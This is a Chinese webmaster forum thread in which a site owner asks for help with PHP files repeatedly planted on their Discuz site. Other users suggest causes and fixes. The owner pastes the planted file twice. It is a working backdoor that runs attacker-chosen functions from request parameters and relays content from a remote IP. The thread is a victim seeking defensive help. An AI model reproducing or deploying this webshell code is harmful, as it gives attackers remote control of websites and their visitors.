幻影坦克2016 发表于 2017-3-13 11:15:55

网站被添加不明文件,求大神指教

http://att.discuz.net/data/attachment/forum/201701/17/164119enqn2uouo2ywuki2.png

诸如此类的文件,改了服务密码、用户名还有端口,也更新的系统都还是每天被添加。

求大神指教,谢谢!

WZX习惯性潜水 发表于 2017-3-13 11:15:55

被黑了还是某个软件生成?
看看文件内容是什么啊。

jinlllj888 发表于 2017-3-13 11:15:55

对方能写入文件,要么是ftp泄露了,关闭ftp还能写入的话,那就是程序漏洞,这事情,得具体看,看你截图能诊断出来,那就不是神了,是上帝。

WZX习惯性潜水 发表于 2017-3-13 11:15:55

hhb121 发表于 2017-1-17 16:48
对方能写入文件,要么是ftp泄露了,关闭ftp还能写入的话,那就是程序漏洞,这事情,得具体看,看你截图能诊 ...
没有装FTP软件,如果是程序漏洞怎么办?已经是最新版本了

清湾捞仔 发表于 2017-3-13 11:15:55

打开看看内容 非默认可以备份后 删除

洛书菇凉 发表于 2017-3-13 11:15:55

把php贴出来,看看是什么鬼东西

8尘缘非8 发表于 2017-3-13 11:15:55

lotto散人 发表于 2017-3-13 11:15:55

mingkong 发表于 2017-1-17 16:47
被黑了还是某个软件生成?
看看文件内容是什么啊。
绝不是软件

雪风中的一匹狼 发表于 2017-3-13 11:15:55

DZ第一帅哥 发表于 2017-1-17 17:01
删除后又会被添加啊,这个才是麻烦
那可能中毒了

jinlllj888 发表于 2017-3-13 11:15:55

楼主我看你一点都不着急,连被加载出来php也不愿意贴出来,别人知道是怎么回事。另外,不是服务器问题,不是程序问题,那就是插件问题了,把所有插件都关闭,然后删除那些文件,看看还能不能生成。如果在之前你覆盖过文件,如果数据库泄露了,对方也没办法知道你后台管理账户和密码,除非你默认账密admin,所以说不是数据库爆库的问题,那就是你程序漏洞被植入了可执行文件,导致对方能自动写入,贴出来,大家看看写入的是什么。再来判断。

从人者108 发表于 2017-3-13 11:15:55

着重看下服务器安全和插件这块

一人一花一凋零 发表于 2017-3-13 11:15:56

hhb121 发表于 2017-1-17 17:48
楼主我看你一点都不着急,连被加载出来php也不愿意贴出来,别人知道是怎么回事。另外,不是服务器问题,不 ...类似于这样的
<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://103.42.29.48/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
if(key($_GET)=='SERVER')call_user_func($_GET['SERVER'],$_POST['host_name']);
$Content_mb=getHTTPPage($Remote_server."/index.php?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
      $opts = array(
          'http'=>array(
                'method'=>"GET",
                'header'=>"User-Agent: aQ0O010O"
          )
      );
      $context = stream_context_create($opts);
      $html = @file_get_contents($url, false, $context);
      if (empty($html)) {
                exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
      }      
      return $html;
}
?>

k16868k 发表于 2017-3-13 11:15:56

我心枫叶 发表于 2017-1-17 21:46
着重看下服务器安全和插件这块
类似于这样的文件

代码如下,请问怎么搞

<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://103.42.29.48/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
if(key($_GET)=='SERVER')call_user_func($_GET['SERVER'],$_POST['host_name']);
$Content_mb=getHTTPPage($Remote_server."/index.php?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
      $opts = array(
          'http'=>array(
                'method'=>"GET",
                'header'=>"User-Agent: aQ0O010O"
          )
      );
      $context = stream_context_create($opts);
      $html = @file_get_contents($url, false, $context);
      if (empty($html)) {
                exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
      }      
      return $html;
}
?>

雪风中的一匹狼 发表于 2017-3-13 11:15:56

程序出现漏洞了,当用户浏览页面的时候,返回代码,类似于小偷程序,不知道你网站有什么有价值的东西。 应该是在抓取用户数据。能自己搞就自己搞,上传全新程序,按照升级方式全新覆盖,看看情况,如果自己搞不了,付费支持也可以,Q 861827250至于原因,这个不好说,没具体看,说不清楚。
页: [1]
查看完整版本: 网站被添加不明文件,求大神指教